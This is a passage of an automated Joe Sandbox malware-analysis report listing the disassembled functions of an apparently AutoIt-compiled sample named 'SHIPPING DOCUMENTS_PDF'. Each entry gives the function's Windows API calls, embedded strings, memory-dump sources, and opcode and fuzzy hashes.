                                                                                    • Opcode Fuzzy Hash: 4ea14e2d648fe717d069d269136df1d522fe6dfa734fa79ea6cf48bd0abb54bf
                                                                                    • Instruction Fuzzy Hash: C0518E72940509AACB15EBE0DD56FEEB7B8EF14301F1040E5B905720A2EF712E59DB60
                                                                                    Function 00BBA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                                                      • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00BBA3CB
                                                                                    • GetDriveTypeW.KERNEL32 ref: 00BBA418
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BBA460
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BBA497
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BBA4C5
                                                                                      • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                    • API String ID: 2698844021-4113822522
                                                                                    • Opcode ID: fde07920b98bbf6e726c1fed782dc8cb2243705740f20720eb48ebe8e62f4599
                                                                                    • Instruction ID: 47cadb547917e516cbcea960a0b7b7f6b61ea9cc3ce15bdd23ae4cbcb82cbe99
                                                                                    • Opcode Fuzzy Hash: fde07920b98bbf6e726c1fed782dc8cb2243705740f20720eb48ebe8e62f4599
                                                                                    • Instruction Fuzzy Hash: B2516E716087059FC700EF10C89196AB7F8FF98759F1088ADF89A572A1DB71ED0ACB52
                                                                                    Function 00BAF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00B8E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00BAF8DF
                                                                                    • LoadStringW.USER32(00000000,?,00B8E029,00000001), ref: 00BAF8E8
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00C15310,?,00000FFF,?,?,00B8E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00BAF90A
                                                                                    • LoadStringW.USER32(00000000,?,00B8E029,00000001), ref: 00BAF90D
                                                                                    • __swprintf.LIBCMT ref: 00BAF95D
                                                                                    • __swprintf.LIBCMT ref: 00BAF96E
                                                                                    • _wprintf.LIBCMT ref: 00BAFA17
                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00BAFA2E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                    • API String ID: 984253442-2268648507
                                                                                    • Opcode ID: ddf13f7e06bc66fd1a194a8e8d69f772ce2a2952477b03a2668c1f9b4e10bcae
                                                                                    • Instruction ID: f327d0e2149f940294675f37ced9e3ad1fd5ac28b1bceea016ff6445651bc14f
                                                                                    • Opcode Fuzzy Hash: ddf13f7e06bc66fd1a194a8e8d69f772ce2a2952477b03a2668c1f9b4e10bcae
                                                                                    • Instruction Fuzzy Hash: BB413D72944209AACB15EBE0DD96EFEB7B8EF19301F1040E5B905760A2EE355F0DCA61
                                                                                    Function 00BDBA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00BD9207,?,?), ref: 00BDBA56
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00BD9207,?,?,00000000,?), ref: 00BDBA6D
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00BD9207,?,?,00000000,?), ref: 00BDBA78
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00BD9207,?,?,00000000,?), ref: 00BDBA85
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00BDBA8E
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00BD9207,?,?,00000000,?), ref: 00BDBA9D
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00BDBAA6
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00BD9207,?,?,00000000,?), ref: 00BDBAAD
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00BD9207,?,?,00000000,?), ref: 00BDBABE
                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00BE2CAC,?), ref: 00BDBAD7
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00BDBAE7
                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00BDBB0B
                                                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00BDBB36
                                                                                    • DeleteObject.GDI32(00000000), ref: 00BDBB5E
                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00BDBB74
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 3840717409-0
                                                                                    • Opcode ID: 1245a71c53b07b65e93383239f715b4b974795b4b0fb00406c41bd8764cfaa9e
                                                                                    • Instruction ID: c95c6f259702a9c0d6a156a3dc81a32e1da601c4369a7723254f8e9b69e49a66
                                                                                    • Opcode Fuzzy Hash: 1245a71c53b07b65e93383239f715b4b974795b4b0fb00406c41bd8764cfaa9e
                                                                                    • Instruction Fuzzy Hash: 65412975601205EFDB119F65DC98EBABBF9EF89711F1140AAF906D7260EB309A01CB60
                                                                                    Function 00BBD899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __wsplitpath.LIBCMT ref: 00BBDA10
                                                                                    • _wcscat.LIBCMT ref: 00BBDA28
                                                                                    • _wcscat.LIBCMT ref: 00BBDA3A
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BBDA4F
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBDA63
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00BBDA7B
                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00BBDA95
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBDAA7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                    • String ID: *.*
                                                                                    • API String ID: 34673085-438819550
                                                                                    • Opcode ID: 106260429551fab8da9ee1493d2a56478f144e64cc54b4cf4b9fff6c28253e67
                                                                                    • Instruction ID: cf91af45a1a93d5a68b0d444675c385baacad6c09f35e5315669da57870180a6
                                                                                    • Opcode Fuzzy Hash: 106260429551fab8da9ee1493d2a56478f144e64cc54b4cf4b9fff6c28253e67
                                                                                    • Instruction Fuzzy Hash: CA8191716042419FCB24DF64C884ABAB7E4EF89350F1888AEF8C9C7251F7B8D945CB52
                                                                                    Function 00BDC1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00BDC1FC
                                                                                    • GetFocus.USER32 ref: 00BDC20C
                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00BDC217
                                                                                    • _memset.LIBCMT ref: 00BDC342
                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00BDC36D
                                                                                    • GetMenuItemCount.USER32(?), ref: 00BDC38D
                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00BDC3A0
                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00BDC3D4
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00BDC41C
                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BDC454
                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00BDC489
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 1296962147-4108050209
                                                                                    • Opcode ID: 8b2f2d191edba688d5d8c79f553d8e0eb558ae61f903ca323cba247d364d1d32
                                                                                    • Instruction ID: 31e855e6206381a086eb85d674d5f8127d07a258baedea12ad1a081a48ec62b8
                                                                                    • Opcode Fuzzy Hash: 8b2f2d191edba688d5d8c79f553d8e0eb558ae61f903ca323cba247d364d1d32
                                                                                    • Instruction Fuzzy Hash: D6817B706093029FDB14CF14D894ABABBE8FF89714F0049AEF99597391EB30D905CB92
                                                                                    Function 00BC731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 00BC738F
                                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00BC739B
                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00BC73A7
                                                                                    • SelectObject.GDI32(00000000,?), ref: 00BC73B4
                                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00BC7408
                                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00BC7444
                                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00BC7468
                                                                                    • SelectObject.GDI32(00000006,?), ref: 00BC7470
                                                                                    • DeleteObject.GDI32(?), ref: 00BC7479
                                                                                    • DeleteDC.GDI32(00000006), ref: 00BC7480
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00BC748B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                    • String ID: (
                                                                                    • API String ID: 2598888154-3887548279
                                                                                    • Opcode ID: bca092ae2519c38de840b6ec42556c341e721bc3da06a838a832f3ec38c1f804
                                                                                    • Instruction ID: 46845caf4d0fa697a80cafa5e186053ac74eaa7de45898e7778f28715931d982
                                                                                    • Opcode Fuzzy Hash: bca092ae2519c38de840b6ec42556c341e721bc3da06a838a832f3ec38c1f804
                                                                                    • Instruction Fuzzy Hash: BF513875904209EFCB14CFA8CC85EAEBBF9EF88310F14846EF95A97210DB31A941CB50
                                                                                    Function 00B56A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B70957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00B56B0C,?,00008000), ref: 00B70973
                                                                                      • Part of subcall function 00B54750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B54743,?,?,00B537AE,?), ref: 00B54770
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00B56BAD
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B56CFA
                                                                                      • Part of subcall function 00B5586D: _wcscpy.LIBCMT ref: 00B558A5
                                                                                      • Part of subcall function 00B7363D: _iswctype.LIBCMT ref: 00B73645
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                    • API String ID: 537147316-1018226102
                                                                                    • Opcode ID: 5e0a0237b3b0bf00bde181d53460d2d452d1dd223ef4b4ae03eba29edd0b3ff5
                                                                                    • Instruction ID: 48f2924056980deb8df32274284c739893681a648450438c65d1ecccc2c1434a
                                                                                    • Opcode Fuzzy Hash: 5e0a0237b3b0bf00bde181d53460d2d452d1dd223ef4b4ae03eba29edd0b3ff5
                                                                                    • Instruction Fuzzy Hash: A002BC301083419FC724EF24C891AAFBBF5EF99315F5048ADF89A972A1DB30D949CB52
                                                                                    Function 00BB2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BB2D50
                                                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00BB2DDD
                                                                                    • GetMenuItemCount.USER32(00C15890), ref: 00BB2E66
                                                                                    • DeleteMenu.USER32(00C15890,00000005,00000000,000000F5,?,?), ref: 00BB2EF6
                                                                                    • DeleteMenu.USER32(00C15890,00000004,00000000), ref: 00BB2EFE
                                                                                    • DeleteMenu.USER32(00C15890,00000006,00000000), ref: 00BB2F06
                                                                                    • DeleteMenu.USER32(00C15890,00000003,00000000), ref: 00BB2F0E
                                                                                    • GetMenuItemCount.USER32(00C15890), ref: 00BB2F16
                                                                                    • SetMenuItemInfoW.USER32(00C15890,00000004,00000000,00000030), ref: 00BB2F4C
                                                                                    • GetCursorPos.USER32(?), ref: 00BB2F56
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00BB2F5F
                                                                                    • TrackPopupMenuEx.USER32(00C15890,00000000,?,00000000,00000000,00000000), ref: 00BB2F72
                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00BB2F7E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3993528054-0
                                                                                    • Opcode ID: b4bf8cbb3901e52f328926ecdd00d1373943c0eb89c3e472cf72a14df6d951c6
                                                                                    • Instruction ID: f7cee4a5ac52c16bafa013b61ead7d4ba39a09e9ab43f47a0d457dbb64ce4044
                                                                                    • Opcode Fuzzy Hash: b4bf8cbb3901e52f328926ecdd00d1373943c0eb89c3e472cf72a14df6d951c6
                                                                                    • Instruction Fuzzy Hash: 1A71B270605206BFEB218F55DC85FFABFA4FB04764F1442A6F615AA1E1C7F19820DB90
                                                                                    Function 00BA77DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                                                                    • _memset.LIBCMT ref: 00BA786B
                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00BA78A0
                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00BA78BC
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00BA78D8
                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00BA7902
                                                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00BA792A
                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00BA7935
                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00BA793A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                    • API String ID: 1411258926-22481851
                                                                                    • Opcode ID: 4fd64c908f2f3d81409540452cc68fcd46664a1bf9e941ee1e126fed5d441dd8
                                                                                    • Instruction ID: b3352783009413ffa112c7dfdfb65df3c599a1f6bcb94519007a0d58febbcccf
                                                                                    • Opcode Fuzzy Hash: 4fd64c908f2f3d81409540452cc68fcd46664a1bf9e941ee1e126fed5d441dd8
                                                                                    • Instruction Fuzzy Hash: 1B410A72D58229ABCF11EF94EC55EEEB7B8FF04351F0441AAE905A31A1EE345D09CB90
                                                                                    Function 00BD0E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCFDAD,?,?), ref: 00BD0E31
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper
                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                    • API String ID: 3964851224-909552448
                                                                                    • Opcode ID: 73712edc932037bea1afd37609174052d7130355a669af5b8f58b44f2d668af3
                                                                                    • Instruction ID: 0653afebd4caee8befe6c82a60b690ff1ecae0fd086444778eebc74616056b39
                                                                                    • Opcode Fuzzy Hash: 73712edc932037bea1afd37609174052d7130355a669af5b8f58b44f2d668af3
                                                                                    • Instruction Fuzzy Hash: 23414C7152424A8FCF14FF50D8A6BEE77A4EF21700F6444A6FC651B292EB309D1ACB60
                                                                                    Function 00BAF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B8E2A0,00000010,?,Bad directive syntax error,00BDF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00BAF7C2
                                                                                    • LoadStringW.USER32(00000000,?,00B8E2A0,00000010), ref: 00BAF7C9
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                    • _wprintf.LIBCMT ref: 00BAF7FC
                                                                                    • __swprintf.LIBCMT ref: 00BAF81E
                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00BAF88D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                    • API String ID: 1506413516-4153970271
                                                                                    • Opcode ID: 6de06d3e79998b71ad12e7475d758b736d2212a3e433076d70b21fbdce69af66
                                                                                    • Instruction ID: 5ce6fa01ef5fc9aacdbc701e5832bb83bdd579261ec89f428a9663d04c978cc8
                                                                                    • Opcode Fuzzy Hash: 6de06d3e79998b71ad12e7475d758b736d2212a3e433076d70b21fbdce69af66
                                                                                    • Instruction Fuzzy Hash: BA218D3294421AEBCF12EF90CC5AEFE77B8FF18701F0444E6F915660A2EA319618DB50
                                                                                    Function 00BB52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                                                                      • Part of subcall function 00B57924: _memmove.LIBCMT ref: 00B579AD
                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00BB5330
                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00BB5346
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BB5357
                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00BB5369
